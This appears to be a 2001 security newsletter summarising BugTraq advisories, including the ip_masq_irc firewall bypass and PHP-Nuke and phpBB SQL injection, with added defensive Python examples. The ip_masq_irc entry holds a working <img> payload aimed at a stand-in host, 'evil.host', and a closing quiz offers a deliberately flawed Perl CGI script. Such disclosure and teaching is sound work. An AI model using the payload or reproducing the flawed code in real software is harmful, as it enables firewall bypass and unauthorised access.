Linux IRC IP Masquerading Module Arbitrary Firewall Rule Insertion Vulnerability
BugTraq ID: 3117
Remote: Yes
Date Published: 2001-07-30
Relevant URL:
http://www.securityfocus.com/bid/3117
Summary:

The Linux 'ip_masq_irc' IP masquerading module is used to inspect IRC
protocol data and interpret DCC file transfer requests.  The module
dynamically opens and maps ports for IRC data transfers.

The module contains a vulnerability that may allow a remote attacker to
insert malicious rules into the firewall.

When a 'DCC SEND' request is sent from a host behind the firewall and the
request contains an IP address differing from that host, the ip_masq_irc
module opens a port to allow the specified remote host to make a
connection for a data transfer.

Because the module processes any data on port 6667, it may be possible for
an attacker to use a client-based program to exploit the problem.  For
instance, an HTML <img> tag could be sent in an e-mail or on a web page to
a user behind the target network:

  <img src="ftp://evil.host:6667/%01DCC%20SEND%20file%20addr%20port";>

or using another similar pattern, depending on how the module is
configured.  The module may interpret the request as a DCC file transfer
request and temporarily allow a connection to the given port and address
through the firewall.

This could allow an attacker to create a condition where a connection can
be established to any host and port behind the firewall, bypassing the
filtering rules.
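The check that a masquerading helper needs before it opens a return port, as an added example that is not part of the advisory or of the ip_masq_irc module: the advertised address in a DCC SEND must be the requesting client's own address, and the port must be unprivileged. The regex, the sample client address and the sample CTCP payloads are constructed for this example.

```python
import ipaddress
import re

# A CTCP DCC SEND as carried inside an IRC PRIVMSG: file, address, port.
# The address is normally a decimal 32-bit integer; dotted quads are accepted too.
DCC_SEND = re.compile(r"\x01DCC SEND (?P<file>\S+) (?P<addr>\S+) (?P<port>\d{1,5})")

def parse_dcc_addr(token):
    """Return the advertised IPv4 address, or None if the token is not one."""
    try:
        return ipaddress.IPv4Address(int(token) if token.isdigit() else token)
    except ValueError:          # AddressValueError is a ValueError subclass
        return None

def dcc_pinhole_decision(payload, client_ip):
    """Decide whether the helper should open a return port for this request.
    Returns (allow, reason).  The rule that closes the hole described above:
    the advertised address must equal the requesting client's own address."""
    m = DCC_SEND.search(payload)
    if not m:
        return False, "no well-formed DCC SEND request"
    addr = parse_dcc_addr(m.group("addr"))
    if addr is None:
        return False, f"unparsable address {m.group('addr')!r}"
    port = int(m.group("port"))
    if not 1024 <= port <= 65535:
        return False, f"port {port} outside the unprivileged range"
    if addr != ipaddress.IPv4Address(client_ip):
        return False, f"advertised {addr} differs from client {client_ip}"
    return True, f"open pinhole to {client_ip}:{port}"

# Constructed sample traffic from an internal client at 192.168.1.10.
SAMPLES = [
    ("\x01DCC SEND notes.txt 3232235786 5000\x01", "192.168.1.10"),  # own address
    ("\x01DCC SEND notes.txt 167772165 5000\x01", "192.168.1.10"),   # 10.0.0.5
    ("\x01DCC SEND file addr port", "192.168.1.10"),                  # decoded URL form
]

if __name__ == "__main__":
    for payload, client in SAMPLES:
        print(dcc_pinhole_decision(payload, client))
```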

phpMyAdmin Arbitrary Command Execution Vulnerability
BugTraq ID: 3121
Remote: Yes
Date Published: 2001-07-31
Relevant URL:
http://www.securityfocus.com/bid/3121
Summary:

phpMyAdmin is a freely available tool that provides a WWW interface for
handling MySQL administrative tasks.

An input validation error exists in phpMyAdmin that could allow remote
users to cause arbitrary commands to be executed by the PHP interpreter at
runtime.

The problem is the result of how some variables are handled in the
'tbl_copy.php' and 'tbl_rename.php' scripts.  It is possible to submit
values for certain variables internal to the scripts.  Under certain
circumstances, the variables are evaluated with the eval() command, making
it possible for an attacker to submit the commands he or she wishes to
have executed as the value of that variable.

No authentication mechanisms are enabled with default installations of
phpMyAdmin.

GNU Locate Arbitrary Command Execution Vulnerability
BugTraq ID: 3127
Remote: No
Date Published: 2001-08-01
Relevant URL:
http://www.securityfocus.com/bid/3127
Summary:

GNU locate is an application that searches file databases for file names
that match user-supplied patterns.

The program supports searching through filename databases composed in two
different formats: an old format produced by Unix versions of locate and
find, and a new format used in versions 4.0 and greater of GNU locate.

A boundary condition error can occur when the program reads old-format
database files.  Each individual database entry begins with a one byte
offset-differential count, indicating the number of characters of prefix
of the preceding entry to use beyond the number that the preceding entry
is using as its predecessor.  Byte values 0 through 28 indicate
offset-differential counts from -14 through 14.  If the
offset-differential count is larger than can be stored in a byte, the byte
has the value 30 and the count follows in a machine-size word.

The problem exists because the machine-size word following a byte value of
30 is treated as a signed integer.  By inserting an entry into the
database with a negative value as the offset-differential count, it is
possible to cause the program to write data read from the file to
arbitrary locations in process memory.

If an attacker is able to write a malicious entry to a database file used
by other users, the attacker could cause arbitrary code to be executed by
another user when the user runs the locate program.

It should also be noted that in earlier versions of Slackware (circa 3.5)
the file is written by the superuser.
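A reader for the old-format entries with the bounds check the advisory describes as missing, as an added example that is not GNU locate's code: the running shared-prefix length is rejected when the count makes it negative or longer than the previous entry. The layout is simplified and constructed (16-bit little-endian count word, NUL-terminated suffix); the count-byte mapping and the escape value 30 follow the text above.

```python
import struct

OLD_ESCAPE = 30     # count byte meaning "the real count follows in a word"
WORD_FMT = "<h"     # assumed: a 16-bit little-endian signed word

class LocateDbError(ValueError):
    """Raised for any entry the hardened reader refuses."""

def decode_old_locatedb(data):
    """Yield paths from a simplified, constructed old-format database:
    per entry a count byte (0..28 -> -14..14, 30 -> signed word follows)
    and then the new suffix, NUL-terminated.  The shared-prefix length is
    the running sum of the counts; that sum is what must be bounds-checked."""
    pos, prev, shared = 0, b"", 0
    while pos < len(data):
        b = data[pos]
        pos += 1
        if b == OLD_ESCAPE:
            if pos + 2 > len(data):
                raise LocateDbError("truncated count word")
            (count,) = struct.unpack_from(WORD_FMT, data, pos)
            pos += 2
        elif b <= 28:
            count = b - 14
        else:
            raise LocateDbError(f"bad count byte {b}")
        shared += count
        # The check the vulnerable reader lacks: a negative or oversized
        # prefix length indexes outside the previous entry's buffer.
        if not 0 <= shared <= len(prev):
            raise LocateDbError(f"prefix length {shared} out of range")
        end = data.find(b"\0", pos)
        if end < 0:
            raise LocateDbError("unterminated entry")
        path = prev[:shared] + data[pos:end]
        pos, prev = end + 1, path
        yield path.decode("latin-1")

def read_all(data):
    """Return (paths, error) so a caller can log why a database was refused."""
    try:
        return list(decode_old_locatedb(data)), None
    except LocateDbError as exc:
        return [], str(exc)

# Constructed samples: a valid database, then one whose escaped count word is negative.
GOOD_DB = bytes([14]) + b"/usr\0" + bytes([18]) + b"/bin\0" + bytes([18]) + b"/ls\0"
BAD_DB = GOOD_DB + bytes([OLD_ESCAPE]) + struct.pack(WORD_FMT, -100) + b"x\0"
```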

WvDial Insecure Default Permissions Vulnerability
BugTraq ID: 3128
Remote: No
Date Published: 2001-08-01
Relevant URL:
http://www.securityfocus.com/bid/3128
Summary:

WvDial is a Linux-based dialer, intended to allow dialup network
functionality.

When WvDial is compiled and installed it creates a configuration
file ('wvdial.conf'). Sensitive information may be stored in this file,
such as usernames/passwords for dialup services. The problem is that this
file is created, by default, with world-readable permissions.

It should be noted that WvDial does not automatically store dialup account
information. Additionally, users have the option of using a pre-existing
configuration file.

Due to insecure default permissions, any local user on the host is privy
to the information in this file.

It has been reported that this default configuration may not be present in
all systems using WvDial (such as RedHat).

PHPBB Remote SQL Query Manipulation Vulnerability
BugTraq ID: 3142
Remote: Yes
Date Published: 2001-08-03
Relevant URL:
http://www.securityfocus.com/bid/3142
Summary:

phpBB is free, open-source, easy-to-use web forums software.

An issue exists in phpBB which allows a remote attacker to manipulate SQL
queries in such a way as to gain an administrative account with the
service.

PHP normally strips backslashes from HTTP requests. However, 'auth.php'
contains an algorithm which overrides this feature. The result is that
input passed to certain variables via phpBB may be able to reach SQL
queries. One such variable is 'viewemail'. This issue can be exploited by
making a cleverly crafted web request that contains arbitrary
user-supplied replacement values.

One consequence of successful exploitation is that the attacker will be
privy to user information.

XMCD Temp Directory Symbolic Link Vulnerability
BugTraq ID: 3148
Remote: No
Date Published: 2001-08-03
Relevant URL:
http://www.securityfocus.com/bid/3148
Summary:

xmcd is a freely available CD-playing utility for the various UNIX
platforms.  It is maintained in the public domain.

A problem in the cda utility included with the package can allow a user to
overwrite files, potentially creating a denial of service.

When executed, cda creates temporary files insecurely.  It is possible for
a user to predict the name of a future temporary file, and create a
symbolic link pointing to another file to be overwritten.  Once executed,
cda attempts to create and write to the temporary file, overwriting the
file that has been symbolically linked.

cda is installed setuid root, which makes it possible for a user
exploiting this vulnerability to overwrite any root owned file.
Exploitation of this vulnerability could result in a denial of service,
and potentially an elevation of privileges.

PHP-Nuke Remote SQL Query Manipulation Vulnerability
BugTraq ID: 3149
Remote: Yes
Date Published: 2001-08-03
Relevant URL:
http://www.securityfocus.com/bid/3149
Summary:

PHP-Nuke is a website creation/maintenance tool written in PHP3.

PHP-Nuke reportedly contains a vulnerability introduced in a new feature
which may permit remote attackers to execute almost arbitrary SQL queries.

In version 5.x of PHP-Nuke, the administrator can set an arbitrary prefix
for the database table names.  Because it is a prefix for PHP-Nuke tables,
this variable is included in many SQL queries used by PHP-Nuke.

If remote clients can submit their own value for 'prefix', they can alter
SQL query strings so that almost arbitrary database operations are
performed.

By default, most PHP-Nuke scripts include a PHP file called 'mainfile.php'
containing library code and constants for use throughout the application.
'prefix' is defined in this file, and scripts that include 'mainfile.php'
cannot be exploited by remote attackers as the 'prefix' value defined in
'mainfile.php' will override a remotely supplied value.  In some scripts,
attackers may be able to cause 'mainfile.php' to not be included, making
it possible to supply an arbitrary 'prefix' value.  The file,
'article.php', is reportedly such a script.  If the 'mainfile' variable is
passed to the script remotely, 'mainfile.php' will not be included by
'article.php'.

Once the file is not included in a PHP script, the attacker may supply an
arbitrary 'prefix' value.  The 'prefix' value is used in the following
manner:

UPDATE $prefix"._stories." SET..

A remote attacker can supply a value for 'prefix' that takes control of
the query after the 'UPDATE' keyword.  In this example, an attacker can
cause an arbitrary table to be updated in any way permitted by database
access controls.  Attackers may, for example, be able to 'UPDATE' all of
the administrators' passwords to values known by the attacker.  She could
then proceed to log into PHP-Nuke as an administrator.

This may permit remote attackers to delete or corrupt data, elevate
PHP-Nuke privileges or even possibly gain local access to the database
server.

by Nathan Neulinger, [EMAIL PROTECTED]
Relevant URL: http://www.securityfocus.com/tools/2132
Platforms: UNIX

CGIWrap is a gateway program that allows general users to use CGI scripts
and HTML forms without compromising the security of the http server.
Scripts are run with the permissions of the user who owns the script. In
addition, several security checks are performed on the script, which will
not be executed if any checks fail.

[ Text manipulation of SQL queries must be done with great care: some
  languages such as Perl instead allow `binding' of certain data types:
  one then writes SELECT * FROM table WHERE (a = ?) and passes one or
  more variables as parameters, which the Perl module concerned
  encapsulates.  In the present case, though, even that does not work:
  this Perl DBI feature cannot be used for table names, for example.  So
  make sure, e.g., that the variable matches /^[a-z0-9_]+$/ before doing
  the text manipulation.
]
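The two-part defence from the PHP-Nuke 'prefix' entry and the note above, as an added example that is not PHP-Nuke's or the note author's code: values are bound with placeholders, while the table prefix, which is an identifier and cannot be bound, is allow-listed with the note's /^[a-z0-9_]+$/ before interpolation. The in-memory SQLite schema, table name and rows are constructed for this example.

```python
import re
import sqlite3

# The allow-list from the note above: a table prefix is an identifier, not a
# value, so it cannot be bound with a "?" placeholder and must be validated.
PREFIX_RE = re.compile(r"^[a-z0-9_]+$")

def prefix_is_safe(prefix):
    """True only for prefixes made of lowercase letters, digits and '_'."""
    return isinstance(prefix, str) and PREFIX_RE.match(prefix) is not None

def update_story_title(conn, prefix, sid, title):
    """The PHP-Nuke pattern done safely: the identifier is allow-listed and
    interpolated, the values are bound by the driver.  Returns the number of
    rows updated; raises ValueError on a prefix that fails the allow-list."""
    if not prefix_is_safe(prefix):
        raise ValueError(f"rejected table prefix {prefix!r}")
    table = prefix + "_stories"                  # mirrors $prefix."_stories"
    cur = conn.execute(f"UPDATE {table} SET title = ? WHERE sid = ?", (title, sid))
    return cur.rowcount

def demo():
    """Constructed in-memory schema standing in for a PHP-Nuke stories table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nuke_stories (sid INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO nuke_stories VALUES (1, 'old title')")
    # A value full of quotes and SQL keywords is stored literally, not executed.
    updated = update_story_title(conn, "nuke", 1, "it's 'quoted'; UPDATE x SET y=1")
    title = conn.execute("SELECT title FROM nuke_stories WHERE sid = 1").fetchone()[0]
    try:                                         # an identifier with SQL in it is refused
        update_story_title(conn, "nuke; --", 1, "ignored")
        rejected = False
    except ValueError:
        rejected = True
    return updated, title, rejected

if __name__ == "__main__":
    print(demo())   # (1, "it's 'quoted'; UPDATE x SET y=1", True)
```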

Ah, and to see whether you have read this far: the following Perl code has
a serious security problem. Answers to [EMAIL PROTECTED] (mind the
Reply-To:); the first one wins a Linux pin (if I manage to find it).

   #! /usr/bin/perl -w

   use strict;
   use CGI;

   my $query = CGI->new;

   # The idea is that every operation is open to everyone, but privileges
   # are raised when the person knows the administration password.

   my $is_admin = 0;
   if (defined($query->param('admin_password'))
       && &is_valid_admin_password($query->param('admin_password'))) {
      $is_admin = 1;
   }

   if (defined($query->param('operation'))
       && &is_valid_operation($query->param('operation'))) {
      # This function is not defined here, but it performs the requested
      # operation, possibly with administrator rights.
      &do_operation($query->param('operation'), $is_admin);
   }

   exit 0;

   sub is_valid_admin_password {
      my ($password) = @_;

      # This is not pretty, but it is not the security problem we are
      # interested in.
      return $password eq 'turlututu';
   }

   sub is_valid_operation {
      my ($operation) = @_;
      my %valid_operations = ('lire' => undef,
                              'ecrire' => undef,
                              'modifier' => undef);

      return exists $valid_operations{$operation};
   }

NB: this is pseudo-code; it may need a bit of tweaking to make it run.
